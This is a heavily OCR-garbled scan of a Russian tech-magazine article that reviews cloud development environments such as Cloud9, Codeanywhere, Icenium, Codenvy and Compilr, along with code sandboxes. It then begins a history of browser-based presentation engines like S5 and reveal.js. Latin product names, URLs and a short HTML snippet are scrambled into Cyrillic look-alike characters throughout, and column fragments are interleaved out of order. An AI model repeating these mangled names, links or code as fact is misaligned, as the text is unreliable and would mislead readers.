в такой город, как сразу начинаешь по- 
нимать, почему облачные технологии еще 
долго не смогут вытеснить полноценные 
приложения. Зачастую качество доступа 
к Сети оставляет желать лучшего. 

Другой немаловажный минус абсо- 
лютно всех облачных продуктов — от- 
сутствие возможности безболезненной 
миграции на альтернативные решения. 
Рано или поздно облачный продукт может 
прекратить свое существование и тебя 
с твоими проектами попросят покинуть 
виртуальное пространство. Вот тут и нач- 
нется самое интересное. Как безболез- 
ненно мигрировать на альтернативное 
решение? 


Рано или поздно облачный продукт прекра- 
тит свое существование и тебя попросят 
покинуть виртуальное пространство 
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ИИр5://пешгоп-апуе.аррзро{.сот — 
невысокая цена, поддержка громадного 
количества языков программирования 
(около 40), современный интерфейс, 
поддержка автоматического сохранения 
изменений в Сооде ОПиуе и другой по- 
лезный функционал для разработчика 
объединились в рамках проекта Мешгоп 
Оиуе. 

ИИрз://коЧта.сот — новая реинкарна- 
ция проекта славно почившего Кодтдеп. 
Среда в первую очередь ориентирована 
на веб-разработчиков. Поддерживаются 
языки Чауасиру, С$$, НТМЕ, РНР На мо- 
мент написания статьи сервис работал 
в Баа-режиме, регистрация была воз- 
можна только по инвайтам. 
есйрзе.ога/омоп — облачная опен- 
сорсная РЕ от разработчиков легендар- 
ного Ес!рзе. Поставляется в двух вари- 
антах: в виде сервиса и исходных кодов. 
Если в первом случае Опоп не отличает- 
ся от своих собратьев, то благодаря от- 
крытости сорцов пользователь получает 
возможность развернуть проект в соб- 
ственной сети (например, на работе) 
и обеспечить коллег современной сре- 
дой разработки. 

рпопедар.сот — хорошая альтерна- 
тива для [сетит. Среда сфокусирована 
на разработку мобильных приложений 
под ОЗ и Апагог. В основе лежат те же 
идейные принципы, что и у |сепит, — 
в качестве технологий используется ин- 
струментарий веб-разработчиков. 
ооо.а/ЧХАРа — Зошсекй — облач- 
ная ОЕ, выполненная в виде плагина 
для браузера Сооде Спготе. Все поль- 
зовательские данные (скрипты и так 
далее) ЗоигсекКи хранит в пользователь- 
ском аккаунте Огорбох. Редактор обе- 
спечит подсветкой синтаксиса для сле- 
лующих языков программирования: С/ 
С++, С#, РНР РУПоп, ЧауаЗсиру. 
руПоппае.сот — простенькая об- 
лачная ОЕ для любителей языка про- 
граммирования РУПоп. Возможностей 
минимум, но для тестирования алгорит- 
мов будет в самый раз. 

900.91/25490 — Сойарогаме ШЕ, 
когда-то был многообешающий проект, 
но на данный момент застыл в разви- 
тии. По указанному линку ты не найдешь 
функциональную ШЕ, зато сможешь за- 
грузить исходники и развернуть среду 
разработки в своем облаке. 
900.9/39а52 — зоугсеёат — облач- 
ная ОЕ, выполненная в виде плагина 
для дооде Спготе с мощной поддерж- 
кой языков программирования: С, С++, 
РНР, С$$, чамаЗсирт, Чама и других. Свя- 
зью с внешним миром также не обделе- 
на. Умеет взаимодействовать с популяр- 
ными СОй-хостингами ВиБискеф, сиНоьЬ. 


Ст0009 


ИИ рз://С9.10 
УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: 


Ргее (один приватный репозиторий) / Зпаге 
СТОИМОСТЬ ПЛАТНОЙ ПОДПИСКИ: 
$12 в месяц 

ЯЗЫКИ ПРОГРАММИРОВАНИЯ: 
Чамазсирт, РНР, РУПоп, Виру, НТМЕ, С$$ 
СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: СК 


С9.ю — если не лучшая, то уж точно одна из луч- 
ших облачных ШЕ, нацеленная в первую очередь 
на Моде./$-разработчиков. В начале развития 
проекта многих девелоперов настораживало от- 
сутствие поддержки актуальных версий Мосае. 
4$, но сейчас, когда базовый АР! Моде./$ устака- 
нился, доступная по умолчанию версия рабоче- 
го окружения более-менее догнала реальность 
(0.8.9). 

С9 поражает своей продуманностью, чувству- 
ется, что она создана разработчиками для раз- 
работчиков, благодаря чему сделать Се Запеа 
невероятно легко. Интеграция существующих 
или создание новых проектов (как и настройка 
рабочего окружения) в СЭ абсолютно прозрачна. 
Можно создать новый проект на любой доступной 
технологии (Моае..$, О/апдо, Ва!$) или загрузить 
файлы с локальной машины пачкой — и букваль- 
но через пару кликов рабочее окружение будет 
готово. Есть возможность подключаться к своим 
файлам по ЕТР, ЗН, а благодаря тому, что С9 
предлагает полноценную командную строку, 
можно внутри директории проекта в облаке ис- 
пользовать С так, как если бы это происходило 
на локальной машине. 

Вообще, работа в СЭ действительно напоми- 
нает работу в полноценной десктопной ШЕ и даже 
отличается в лучшую сторону. Подавляющее 
большинство инструментов разработчика Моче. 


ЭНТЕТЕО!Т 


ПЕ рз://зпеан. пе 

УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: Ггее/Зпаге 
СТОИМОСТЬ ПЛАТНОЙ ПОДПИСКИ: 

$5, 99 в месяц или $59, 99 в год, есть скидки 
ЯЗЫКИ ПРОГРАММИРОВАНИЯ: 

Чауа$сирт, РНР. РУПоп, С++/С#, НТМЕ, С$$, Со, 
Реп, уЧауа, Зса!а — всего 28 технологий 
СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: нет 


Первое, что бросается в глаза при знакомстве 
с этой ШЕ, — некая отсталость в интерфейсе 
и несоответствие текущим трендам в дизайне 
веб-приложений. Это скорее облачный редактор 
с подсветкой синтаксиса, чем полноценная ШЕ. 
При запуске тебе сразу предлагается выбрать тип 
документа, с которым ты хочешь работать (к чести 
ЗПЩЕСЙ нужно сказать, что доступно 28 диалектов, 
включая /З$ОМ, 5\@, 1Е$ $). Любителей популяр- 
ных систем контроля версий сразу ждет разочаро- 
вание — эта Е их не поддерживает, а судя по от- 
вету разработчиков, кроме частичной интеграции 
с 5\/М больше ничего поддерживать они и не пла- 
нируют. ЭПИМЕЗЯК позволяет подключаться к своим 
файлам через ЕТР ЗЕТР, Ме АМ, Огоррох, Сооде 
Оиуе или Ата7оп $3. Запускать, как и хранить код, 
предлагается на своих серверах. 

В целом система работает более-менее шу- 
стро, однако некоторые функции реализованы 
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4$ (например, прт) ведут себя абсолютно пред- 
сказуемо. Так, ты можешь рассчитывать на кор- 
ректную работу мейнстримового тюЧемиаге 
СоппесУЕхрге$$, шаблонизаторов Е $, Чаде, под- 
держку драйверов доступа к базам данных (поде- 
топао-пайме, Мопдоо5е ОНМ, соппез-геа!5), 
систем авторизации (раззро\) и даже тех моду- 
лей, сборка которых локально сопряжена с неко- 
торыми не всегда корректно обрабатываемыми 
зависимостями (например, 1сопу). Поддержива- 
ется «умное» автодополнение экспортируемых 
из модулей функций и переменных. Для испол- 
нения приложений выделяется поддомен вида 
ПЕр://<ргоес{Е пате>.<изегпате>.с9.ю. Сам за- 
пуск кода можно производить как в обычном ре- 
жиме, так и в режиме отладки. 


на очень низком уровне. Например, автодопол- 
нение, о котором разработчики гордо заявляют 
на промостранице, неприятно удивляет своей 
топорностью, иногда предлагая выбрать из сотен 
ключевых слов в ситуации, в которой явно должно 
быть не более 5-10 вариантов. 

Из положительных моментов стоит отметить 
нормальную проверку и подсветку синтаксиса 
(вообще, здесь сложно что-то испортить), под- 
держку тем, ММУМ/МС-редактор, «живое» редак- 
тирование, ну и всякие полезные мелочи, вроде 
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СЭ постоянно развивается, каждый день по- 
являются новые коммиты и вводятся новые функ- 
ции, фиксятся баги (на момент написания статьи 
исправлялись ошибки процессинга РауРа!). Также 
к услугам разработчика менеджер расширений, 
позволяющий в один клик установить популярные 
дополнения рабочей среды и значительно расши- 
рить и без того не бедный функционал этой заме- 
чательной ШЕ. 

Единственная проблема СЭ — несколько 
подтормаживающий интерфейс. Из-за обилия 
АЧАХ’а и в целом навороченности интерфейса 
многие операции совершаются со скрипом. Ред- 
ко, но элементы управления даже зависают в про- 
цессе работы, но, как уже было сказано выше, ра- 
бота над улучшением С9 ведется постоянно. 


подсветки текущей строки, обрезания лишних 
пробелов, автозакрытия скобок и прочего функ- 
ционала, присущего любому нормальному тек- 
стовому редактору. 

Кроме снятия ограничения на количество 
проектов, бизнес-редакция ЭПИЕЯЙ не пред- 
лагает основной массе пользователей ничего 
такого, за что можно было бы отдать деньги, — 
так, почти за 60 долларов в год ты получаешь 
историю ревизий кода и улучшенную интеграцию 
с Огеатуеамег. 
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СОБЕАМУ\/НЕВЕ 


ПЁрэ://со4еапумипеге. пе 
УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: Ггее/Зпаге 


СТОИМОСТЬ ПЛАТНОЙ ПОДПИСКИ: 

$5 в месяц или $50 в год 

ЯЗЫКИ ПРОГРАММИРОВАНИЯ: уауаЗсиру, 
С$$, НТМЕ, ХМЕ, РНР 

СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: СИ 


Разработчики Содеапумеге уверены, что настоя- 
щим программистам для полного счастья не хва- 
тает возможности программировать в любом 
месте и в любое время. Наличие компьютера под 
рукой значения не имеет. Главное, чтобы при себе 
был современный гаджет вроде смартфона или 
планшета и доступ к инету. Все остальное предо- 
ставит Содеапумпеге. 

Целевая аудитория проекта СА\М/ (Содеапу- 
мпеге) — веб-разработчики, специализирующи- 
еся на создании новых приложений при помощи 
Чамазсирт, РНР, НТМЁЕ и С5$5. 

Помимо типичного набора для 10Е облачного 
формата вроде легковесного редактора с автодо- 
полнением кода и подсветкой синтаксиса, разра- 
ботчики САМ/ предлагают полноценную площадку 
для разработки и тестирования приложений. До- 
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мимими1сепит.сот 

УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: Зпаге 
СТОИМОСТЬ ПЛАТНОЙ ПОДПИСКИ: 
$16-19 в месяц 

ЯЗЫКИ ПРОГРАММИРОВАНИЯ: 
Чамазсирт, С$$, НТМЕ 

СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: СИ 


Одна из главных проблем, с которой сталкивается 
каждый разработчик мобильных приложений, — 
необходимость установки разных ШЕ и $0К. 
Что хорошо для разработки под Апаго, то никуда 
не годится под 105. 

Разработчики из компании |сепит  по- 
пытались найти оригинальное решение этой 
проблемы. В результате появилась новая ОЕ 
и технология, адаптирующая инструменты веб- 
разработчиков (ЧамаЗсирт, С$$, НТМЕ5) для соз- 
дания мобильных приложений. С ее помощью 
весь цикл создания приложения (от прототипа 
до публикации в Арр З{оге / Сооде Р!ау) выполня- 
ется прямо в браузере. 

Среда разработки снабжена всем необходи- 
мым инструментарием для продуктивной работы. 
Быстрый доступ к необходимым ЗОК/фреймвор- 
кам (|Очегу, Кепао Ш Мое). Достаточно функ- 
циональный редактор кода (подсветка синтакси- 
са, автодополнение, синтаксический контроль). 
Работа с СЁ (поддерживаются СЙНиЬ, ВИБискеф. 
Наличие встроенных «эмуляторов» Апагоало$ 
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ступ кинтерпретатору РНР, наличие СУБД МУЗСЕ, 
взаимодействие с системой контроля версий СН, 
возможность загрузки файлов из облачного хра- 
нилища Огорбох, встроенный ЕТР-клиент — все 
это ключевые опции САМ. 

Помимо стандартной браузерной версии, 
на скамейке запасных у СА\М/ есть нативные 
клиенты для популярных мобильных платформ 
(Апагоа, 0$, ЕНаскВегту). Собственно говоря, 
благодаря им лозунг «Программируй в любом ме- 
сте, в любое время» оправдывает себя на все сто. 


п 
© 
16 
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и ряд других плюшек, упрощающих процесс раз- 
работки. 

Интерфейс ТРЕ хорошо оптимизирован. 
Задержки при вызове той или иной функции 
минимальны, поэтому создается ощущение, 
что работаешь с десктопным приложением. Раз- 
работчикам 1сетит удалось сделать элегантное 
решение нестандартной задачи. Причем оно 
интересно не просто как облачная среда разра- 
ботки, а как полноценная платформа, покрываю- 
щая весь цикл создания мобильного приложения 
(от прототипа до публикации в Арр Зоге). 


ПОЛЕЗНЫЕ ИНСТРУМЕНТЫ ДЛЯ РАЗРАБОТЧИКОВ 


. содерепло — хороший редактор для фронтенд-девелоперов. Главная . 1540." — сообщество фронтенд-разработчиков. Сервис позволяет писать 


киллер-фича — возможность одновременного редактирования С$$/ 
НТМЕ//$-кода. Весь код и результат его выполнения представлен на од- ° 
ном экране. Внесение изменений тут же отражается на результате. 
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и тестировать свой код, а также работать с проектами других участников. 
гепасе.сот — песочница для тестирования и отладки регулярных выра- 
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ЕВВХ 


мимим/.его!х.сот/]5 
УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: Зпаге/Ргее 


СТОИМОСТЬ ПЛАТНОЙ ПОДПИСКИ: 
$14,95—69,95 в месяц 

ЯЗЫКИ ПРОГРАММИРОВАНИЯ: уауаЗ спирт 
СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: СИ 


Внешний вид Ех кажется слегка устаревшим 
и не соответствующим современным крите- 
риям минимализма и простоты. Тем не менее 
эта ОЕ пользуется достаточной популярностью 
у Чауазсир{-разработчиков. Помимо тривиаль- 
ных функций для ПО такого типа, у Ех имеется 
возможность публикации созданных приложений 
в собственный АррЗоге, а также присутствует 
поддержка СУБД Розогеб ОЕ. Последняя возмож- 
ность наиболее интересна: благодаря ей вполне 
реально создать полноценный блог или другое 
полезное приложение, которому необходимо где- 
то хранить промежуточные данные. 

Слегка устаревший интерфейс компенсиру- 
ется стабильностью работы и такими полезными 
функциями, как взаимодействие с СУБД, под- 
держка модулей Соттопу$ и Втдо045. 
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АКЗНЕБЕ 


мимиму.акпе!. сот 

УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: Ггее 
ЯЗЫКИ ПРОГРАММИРОВАНИЯ: уауазсир{ 
СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: СН 


Бытует мнение, что специализированный инстру- 
мент всегда лучше, чем универсальный. Глядя 
на Акзпе!, понимаешь, что в этой теории опре- 
деленно что-то есть. Своему рождению данный 
инструмент обязан любителям языка програм- 
мирования уауа5сирт. Разработчик проекта по- 
старался спроектировать хороший инструмент, 
способный преодолевать трудности, которые 
подстерегают собратьев по цеху. 

Интерфейс Ак$зпе! выполнен в лучших тради- 
циях минимализма: ничего лишнего, только са- 
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СОБЕВОМУТООЮ 


мимими.соаегий. сот 

УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: РГее 
ЯЗЫКИ ПРОГРАММИРОВАНИЯ: 
ЧамаЗсирь С#, РНР 

СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: нет 


Содерип ЗфиЧю — одна из немногих облачных 
ОЕ, ориентированная на С#-разработчиков. Чуть 
позже проект был обновлен, и копилка поддержи- 
ваемых языков программирования пополнилась 
РНР и Чауа5сир\. Как фанат технологии .МЕТ и С# 
в частности, я был приятно удивлен, что среди про- 
ектов присутствуют возможность создавать про- 
екты типа АЗР .МЕТ М\УС, М/РЕ Вгомизег Аррйсайоп, 
меню и так далее. 

Для С#-проектов поддерживается пошаговая 
отладка. Работает весьма сносно, и для отладки 
небольшого количества кода встроенного отлад- 
чика более чем достаточно. С большими проек- 
тами при отладке могут возникнуть проблемы. 


мое необходимое. Из кодерских инструментов, 
присущих всем ОЕ, АкК$зпе!Й готов предложить: 
редактор с подсветкой синтаксиса и провер- 
кой ошибок в синтаксисе, менеджер проектов 
и встроенную консоль для взаимодействия с си- 
стемой контроля версий СИ. 

Для знакомства с возможностями Акзпе! ре- 
комендуется посмотреть демонстрационные 
приложения, разработанные при помощи этой 
среды. Их можно найти в официальном репозито- 
рии проекта на СИНиБ’е. 

Резюмируя сказанное, мы получаем неплохую 
реализацию еще одного облачного уамаЗсир{- 
редактора. Минимализм и скорость работы 
воодушевляют, но у проекта периодически на- 
блюдаются серьезные проблемы с хостингом. 
Возможно, это временно. Однако при моем те- 
стировании проблемы имели место быть. 


а Ч а а а И ЕЕ 


а Зоне. сне новые В 215 | с Ернаи "| - БогНаСеТОНЕ. = "Взементинания” 
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По непонятным причинам интерфейс намертво 
замирает, после чего спасает только полная пере- 
загрузка приложения. 

Текстовый редактор выполнен в типичном 
для подобных проектов стиле. Есть автодопол- 
нение кода, подсветка синтаксиса, подсказки 
по функциям, синтаксический контроль, интер- 
фейс с табами. 

На этом достоинства ОЕ заканчиваются, 
и эстафету подхватывает команда ложек дегтя. 
Одна из главных проблем проекта — тормоза. Тор- 
мозит интерфейс (особенно при сборке решения); 
периодически отваливается коннект к тестовому 
серверу; напрочь отсутствует хоть какая-нибудь 
интеграция с внешними сервисами вроде СИ; раз- 
работчики очень редко обновляют компиляторы/ 
интерпретаторы. 

Проект интересный, но его развитие идетчере- 
пашьими шагами. Ошибки и тормоза не позволяют 
поставить этот проект в одну линию с более силь- 
ными игроками рынка. Проект хорош, но только 
в образовательных целях и для мелких проектов. 


АЛЬ + ‘>. га > сб * мо * мыр > 
= нм мощ 5. 
© - 
— = ыы о | + 
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СОБЕМУУ 


ПЁр5://содепуу.сот 
УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: Егее/Зпаге 


СТОИМОСТЬ ПЛАТНОЙ ПОДПИСКИ: 
$9—99 в месяц 

Языки ПРОГРАММИРОВАНИЯ: 

Чама, РНР ЧамаЗсирт, РУпоп, Виру, НТМЕ, С$$ 
СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: СН 


Интерфейс Содепуу выполнен в классическом 
для ОЕ стиле: куча полезных мастеров, упро- 
щающих рутинные действия; главное меню, 
напичканное всевозможным функционалом; 
интерфейс в виде табов; менеджер проектов; 
интеграция с такими необходимыми вещами, 
как СН. Сам интерфейс проработан доста- 
точно хорошо. После настольных ШЕ особого 
дискомфорта не испытываешь. Все на своих 
местах. Техническая сторона реализации ин- 
терфейса заслуживает особого уважения. За- 


СОМРИЕВ 


ПИ рз://согприйг. сот 
УСЛОВИЯ ИСПОЛЬЗОВАНИЯ: Егее/Зпаге 
СТОИМОСТЬ ПЛАТНОЙ ПОДПИСКИ: 
$20—40 в месяц 
ЯЗЫКИ ПРОГРАММИРОВАНИЯ: 
С, С#, Ройгап, РНР ВиБу, РУПоп, \В, ОЦесйуе 
Си другие 
СИСТЕМА КОНТРОЛЯ ВЕРСИЙ: нет 


Любителям чистого и неперегруженного ин- 
терфейса однозначно придется по душе среда 
разработки Сотриг. Создатели проекта не ба- 
луют богатым набором возможностей, а просто 
предоставляют в распоряжение пользователя 
в меру функциональный редактор кода и услуги 
интерпретатора/компилятора. 

Интерфейс приложения не похож на клас- 
сические ШЮЕ. Здесь нет кишащих кнопками 


(Е 1м“ 
пачных ГОЕЙ 


держки минимальны, и среда ведет себя до- 
статочно отзывчиво. 

В Содепуу множество самых разнообраз- 
ных инструментов. Из наиболее интересных 
стоит выделить: поддержку СИ-хостингов; 
поддержку большого количества Раа$ (А\М$ 
Назис  Беапчак, Ореп5ПМ, СюоицаВее$, 
СюоцаРоиупау, АррЁГод, Сооде Арр Епате, 
Негоки); инструменты рефакторинга; под- 
держку парного программирования; наличие 
встроенного отладчика и так далее. 

Классический интерфейс в стиле на- 
стольных решений, сбалансированный набор 
инструментов, шустрая работа, интеграция 
с популярными Раа$-сервисами выделяют 
Содепуу среди подобных проектов. Огорча- 
ет лишь, что данная среда в первую очередь 
ориентирована на уауа-разработчиков. Наи- 
более интересные функции вроде отладчика 
и рефакторинга доступны только для чама- 
проектов. 


* Гобанге керозк 
Соя Яягрозкогу 


х ^^ керозкогу 


С ЦА (ЯАе»Я-Ону ) 


панелей инструментов. Главное меню с кучей 
возможностей также отсутствует. Вспомога- 
тельных инструментов вроде системы контроля 
версий или отладчика здесь тоже нет. А что тог- 
да есть? Только редактор с подсветкой синтак- 
сиса (функций вроде автодополнения, подска- 
зок нет) и компилятор/сборщик. 

Полноценной ШЕ этот проект назвать нель- 
зя. Функционал настолько прости беден, что го- 
дится разве для совсем небольших проектов. 
Главная изюминка Сотрйг — поддержка боль- 
шего количества языков программирования 
и компиляторов. 

Наиболее интересным вариантом исполь- 
зования Сотриг мне представляется во время 
изучения новых языков программирования или 
когда нужно написать код на малоиспользуе- 
мом языке, не устанавливая у себя на компе 
лишнее программное обеспечение и не замо- 
рачиваясь с зависимостями. 


Каубоага эпопеи 


ыы +. = пя пен 


Ве 


Гры Ргзеиюняи 


ПОЛЕЗНЫЕ АДДОНЫ 


Заходя на форумы программистов типа 
Заск ОмегНом,, можешь быть уверен — 
в8из 10 топиков по уауа$сира, НТМЁ или 
С$$ ты встретишь отсылки к этим серви- 
сам. Это — песочницы для тестирования 
маленьких кусочков С$5$- или /$-кода. 


|5„аче (15п1001е.пет) 
Один из самых популярных сервисов, 


король песочниц :). Имеет очень удобный 
|ауочт, поддерживает кучу популярных 
фреймворков и библиотек типа Апашаг, 
|Оиегу, Кпоскощ, Во гар. Можно вы- 
брать способ подключения: библиотека 
может быть описана в Пеаа, Боду, загру- 
жена по событию оп!Гоаа или опВотВеаа. 
Позволяет тестировать А.АХ-запросы 

и имеет отличную документацию. 

4$ В (1551п.с0т) 

Тоже отличный сервис. Поддерживает все 
популярные фреймворки, ориентирован 
на отладку /$-кода. Приятная особен- 
ность — рефреш не убивает изменения. 
Крупный минус для меня — отсутствие 
столь четкого, как в предыдущем сервисе, 
|ауоц{ (например, нет отдельной области 
для С$5). В остальном — все на высоте. 
ОаБыей (да551е{.сот) 

Милая песочница с симпатичным интер- 
фейсом, подходит только для отладки 
С$$ и НТМЕ, поддержка уауасиру в са- 
мой зачаточной стадии. Не рекомендовал 
бы его для ежедневной работы. 

С$$ОезК (с55ЧезК.сот) 

Простой и узкоспециализированный 
сервис для тестирования НТМЁ и С$$ 

с солидной историей. На протяжении все- 
го времени существования тулза остается 
верной своей философии и честно по- 
зволяет тестировать С$$ и НТМЕ. Имеет 
понятный и приятный интерфейс. 
Тикет (ппкегот.сот) 

Хорошая альтернатива |5 НАЧ. Похожий 
|ауощ, возможность расширить область 
НТМЕ, С$$ или У$ за счет вкладок. Имеет 
живой автоапдейт. Поддерживает 1Е$5$, 
$А$$, СоНезсирА. В целом работает — 

за большим советую идти на |5Наае.пет :). 


ВОЗВРАЩАЕМСЯ НАЗЕМЛЮ 

Все рассмотренные в статье решения 
обладают интересным функционалом 
и заставляют взглянуть на привычные 
вещи под другим углом. Уже сейчас 
мы имеем возможность разрабатывать 
простые приложения для различных 
платформ, не устанавливая на своем 
рабочем месте тяжеловесных при- 
ложений. Однако говорить о профес- 
сиональном использовании облачных 
сред разработки все же рано. Минусов 
у подобных решений хватает, а плюсы 
не в состоянии перекрыть наработан- 
ные годами достоинства настольных 
решений. Вот и получается, что пока об- 
лака лишь инструмент, а не серебряная 
пуля, которую многие в них пытаются 
разглядеть. = 


до РС2ОМЕ 
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Как делать презентации с помощью веб-технологий 


Все знают офисных монстров РомегРош{ 

и Кеупохте, но мало кто с радостью в них работает. 
Ну что делать, если ты не бухгалтер, а разработ- \ 
чик или просто гик и гораздо комфортнее чувству- у 

ешь себя в коде, чем в офисных пакетах? Хорошие ит а 
новости: презентации давно можно делать прямо = оеразьеувотай.сот 
в браузере и писать с помощью таких знакомых 


вещей, как НТМЁЕ, С$$ или даже Магкао\мт. 


каждому из нас приходит момент, ког- 
ь4 да нужно донести свои мысли до дру- 

гих. Не просто рассказать анекдотец 

коллеге, не пробубнить стишок про 
бурю-мглою, а сообщить что-то принципиально 
важное, объяснить сложную идею, поделиться 
опытом. И если самым талантливым достаточ- 
но выйти на сцену и быть собой, как это делают 
участники ТЕО, то большинству понадобится 
опереться на слайды. Свой первый раз у доски 
с маркерами я забыл напрочь. Помню только, 
что переврал тогда ключевую идею доклада про 
блочную модель С5$5. 
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КАК ЭТО РАБОТАЕТ 


Развитие веб-технологий уже давно увело нас от сайтов-документов, где единственным развлечением было ходить по си- 
ним ссылкам. Сегодня с помощью НТМЕ, С$$ и ЧамазсирЕ можно не только сделать приложение, но и даже написать 
интерфейс для полноценной операционной системы, как в случае с Ргетох 05. 

Как это применить к презентациям? Ты просто пишешь презентацию в НТМЕ, МагКдомт или даже в формате УАМЕ, 
запускаешь результат в браузере, выходишь в полноэкранный режим и начинаешь свой рассказ. Такие презентации пре- 
красно слушаются пультов, позволяют анимировать переходы, вставлять картинки и видео, помимо привычного текста 


И СПИСКОВ. 


Орега - $51тр/у Фе БезЕ имегпе{ Ехрепепсе 


Орега ЗВом/ — первый формат для создания презентаций прямо в браузере. Ты мо- 
жешь попробовать генератор презентаций Хокона Виума Ли (5{.!у/Орега$Иае$). 
Документация в формате ОЗЕ 1.0 также доступна (5\.1у/Орега-5Иае$-4ос). 


Самой ранней попыткой делать презентации прямо в браузере была система Орега ЗПо\м,, 
которая увидела свет в 2000 году. Система основывалась на том, что браузер Орега 4.0 
переключает медиатип «зсгееп» на «ргоесйоп» при переходе в полноэкранный режим. 


Благодаря этому можно было очень легко добавить к статье новые стили, разбивающие Но\/ то Би [4 а реёёел Бгоуу$ег 


ее на слайды, и переключаться между слайдами кнопками <Раде Ур> и <Раде Во\мп>. 


<11пК ге1="<{у1езНее+" впге+="сгееп.с$5" тей1а=" зсгееп"> Накоп \/ Це 
<11пК ге1="$%{у1езНее*" Иге+="рго]ес*1оп.с$5" тмед1а="рго]ес1опт" > 


Файл рго]есйоп.с$$ подключится только в полноэкранном режиме. Причем формат 
Орега Зпом/ работал без единой строчки Чауа сир: для переключения стилей или слай- 
дов, демонстрируя всю мощь С5$ и немного браузерной магии. И это неспроста: глав- 
ным идеологом формата был технический директор Орега ЗоЙ\маге и изобретатель С$$ 
Хокон Виум Ли. 


$5 (5иИ.1у/55-Поте) — кроссбраузерное развитие идей Орега ЗПом/ от Эрика 
Мейера, пример презентации Б{.1у/$5-т1го. «$5» потому, что в полном названии 
целых пять букв 5: ЭЗипр!е З4апдага$-Вазеа Зпае Зпом Зует. 


с5.: Ап игодисНноп Спустя несколько лет другой патриарх С$$ Эрик Мейер расширил возможности Орега 


Зпом/ и опубликовал в 2004 году первую версию движка презентаций под названием 55. 
Идея переключения браузера в режим презентации в полноэкранном режиме, предло- 


ЕНс А_ Мехег женная Орега, не нашла поддержки в других браузерах, поэтому в системе $5 Мейер ис- 
1 ро: у | пользовал уауа$сир{ для переключения стилей презентации. 
Сотр!ех риа! СопзшШипе Система 55 пошагово масштабировала шрифты на слайде в зависимости от размеров 


окна (с помощью медиавыражений С$$), позволяла передвигаться по спискам и другим 
элементам внутри одного слайда, предлагала систему подключения тем оформления 
для презентаций. 

В дальнейшем систему $5 переписали на |Очегу и назвали 56 (6(.1у/з5-1ацегу), а по- 
том и вовсе написали генератор слайдов из вики-разметки на языке Вибу под названием 
$9 (БИ.1у/$5-гиВу). Но эти и другие проекты по мотивам $5 не получили развития и по- 
пулярности. 


ТЕО 
Некоммерческая конференция о техноло- Орега $Ном/ работал без единой строчки 


гиях, развлечениях и дизайне, отличается 


профессиональными выступлениями. Тауазсг [ре для переключения стилей ИЛИ 
слайдов, демонстрируя всю мошь С$$ 


МАВКРОУЛМ ь 
и немного браузерной магии 


Упрощенный текстовый язык разметки, 
созданный Джоном Грубером. Читай 
статью в сентябрьском «Хакере». 
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ЗАТИШЬЕ И ВЗРЫВ 


После появления системы $5 наступило затишье в истории презентаций, работающих в браузерах. То ли все переехали 
на офисные пакеты, то ли возможностей браузеров не хватало для чего-то по-настоящему впечатляющего. 

И только когда С5$3 под руку с НТМЕ5 начали свое триумфальное шествие по планете, произошел настоящий кем- 
брийский взрыв: движки для презентаций в браузере начали появляться один за другим — от самых простых авторских 


до корпоративных. 


(55$ 


С$$$ (Би .[уЛеа-С$$$) — система слайд-шоуЛии Веру, использующая по максиму- 
му возможности С$$. В полном названии С$$-Базеа Зпае$Поми Зу${ет, как и в $5, 
тоже много букв $. 


В 2010 году Лиа Веру начала восхождение на олимп веб-разработки с презентации 
на конференции Его\-Тгепа$, для которой она специально написала движок С$5$. Пре- 
зентация настолько понравилась публике, что Лиа в одночасье стала самым востребован- 
ным спикером на технических конференциях, а движок С$$$ был опубликован на ОЁНиь. 
($$$ наследует идею $5 о максимальном использовании возможностей С$$ для ра- 
боты презентации, однако уаиа$сир{-составляющая движка Лии поднимается на новый 
уровень. К движку были написаны уауа$сир{-плагины: один для подсветки кода и не- 
сколько для редактирования кода прямо на слайдах. Вторая группа плагинов позволяла 
Лии срывать овации, вживую редактируя код примеров со слайда прямо на самом слайде. 
Теперь это были не просто картинки на экране, а живой интерфейс для экспериментов. 
Как и другие движки этой волны, С$$5$ был совместим только с последними версиями 
браузеров, первое время движок Лии нормально работал только в ночных сборках РгеТох. 
Но, как пишет Лиа, техническое окружение на конференциях всегда предполагает либо 
подключение собственного компьютера, либо современную версию одного из браузеров. 


ВЕМЕАЕ. 5 


Веуеа!.]5 (БИ.1у/ге\уеа!-]5) — движок презентаций Хакима Эль-Хаттаба, привлекающий своей 
простотой, ЗВ-эффектами и специальным онлайн-сервисом для создания презентаций г\/1.1о. 


Дело было в 2011 году, шведский разработчик Хаким Эль-Хаттаб готовил доклад про 5\С к мест- 
ной конференции и так заигрался с 3ЗО9-возможностями в С$$, что построил на них простой движок 
для презентаций. Назвал он его тоже просто: С$$ 30 э!аезпом.. Трехмерные эффекты и двухуровне- 
вая навигация настолько полюбились публике, что движок получил развитие под новым названием 
геуеа!.|$. Проект обзавелся не только новым именем, но и другими серьезными вещами, вроде до- 
кументации, поддержки сообщества и репозитория на СИНиЬ, однако не утратил изначальной про- 
стоты: темное поле с высветом посередине, белые буквы по центру и впечатляющие ЗО-пролеты. 
Но Хаким не успокоился на этом и сделал целый сервис г\/1.10, который позволяет создавать презен- 
тации на движке геуеа|.|$ и хранить их на сайте. 

Одна из интересных особенностей этого движка — возможность писать содержимое слайдов 
в формате Магкаомт. Конвертацией этого текста в НТМЁ на лету занимается специальный скрипт. 


АЕУЕАН. $ 


НТМИ РАЕЗЕМТАТОМ$ МАВЕ ЕАЗУ 


Сгеаёе Бу Нают Е 


ЛИРИЧЕСКОЕ ОТСТУПЛЕНИЕ 


МЕО 


\Меб З{апдага$ Вауз 
(меб{апдаг$Чауз.ги) — 
это бесплатная конференция 
по фронтенд-технологиям, ко- 
торая проводится с 2009 года 
сообществом «Веб-стандарты» 
в Минске, Киеве, Петербурге, 
Москве и в других городах. 


Здесь приходит время поделиться личным опытом. 
